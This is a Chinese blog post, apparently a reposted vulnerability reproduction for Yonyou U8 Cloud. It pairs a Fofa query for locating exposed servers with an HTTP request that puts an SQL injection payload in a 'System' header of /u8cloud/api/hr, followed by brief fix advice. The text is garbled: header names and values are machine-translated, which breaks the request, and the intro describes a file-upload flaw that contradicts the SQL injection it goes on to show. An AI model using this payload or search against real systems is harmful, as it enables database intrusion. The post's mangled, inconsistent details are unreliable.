【漏洞复现】用友 U8(用友u8.72)

【漏洞复现】用友 U8免责声明: 本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该

免责声明:

本文内容旨在提供有关特定漏洞或安全漏洞的信息,帮助用户更好地了解潜在风险。披露此类信息的目的是为了提高网络安全意识和技术进步,并不用于任何恶意目的。读者应了解,如果利用本文中提到的漏洞信息或执行相关测试,可能会违反某些法律、法规或服务协议。同时,未经授权访问系统、网络或应用程序可能会导致法律责任和其他严重后果。作者对读者根据本文内容所采取的任何行动或结果不承担任何责任。读者在使用本文提供的信息时必须遵守适用的法律、法规及相关服务协议,并自行承担一切风险和责任。

产品简介

U8云注重企业内部管控,管理规范、高效、协作、透明。云模式、低成本、快速部署、开箱即用,使企业无需投资硬件或软件即可快速构建企业管理架构。通过与云服务链接,您可以创新业务和服务模式。该产品的upload.jsp存在允许上传任意文件的漏洞。

漏洞描述

用友U8 Cloud API/hr接口存在SQL注入漏洞,攻击者可利用该漏洞获取服务器数据库权限。

网络空间测绘

Fofa

app=\’用友-U8-云\’

漏洞复现

获取/u8cloud/api/hr HTTP/1.1

主机: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (Maverick) Firefox/3.6.10

Cache-Control: 无缓存

关闭连接:

Pragma: 无缓存

System: -1\’ 或1=(@@版本)–+-

不安全的升级请求: 1

Accept-Encoding: gzip、deflate、br

修复建议

1. 如有必要,阻止公共网络访问系统。

2. 通过防火墙等安全设备配置访问策略和白名单访问。

3. 将您的产品升级到最新版本。

#【漏洞复现】以上用友U8相关内容摘自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92647.html

Like (0)
CSDN的头像CSDN
Previous 2024年6月27日
Next 2024年6月28日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注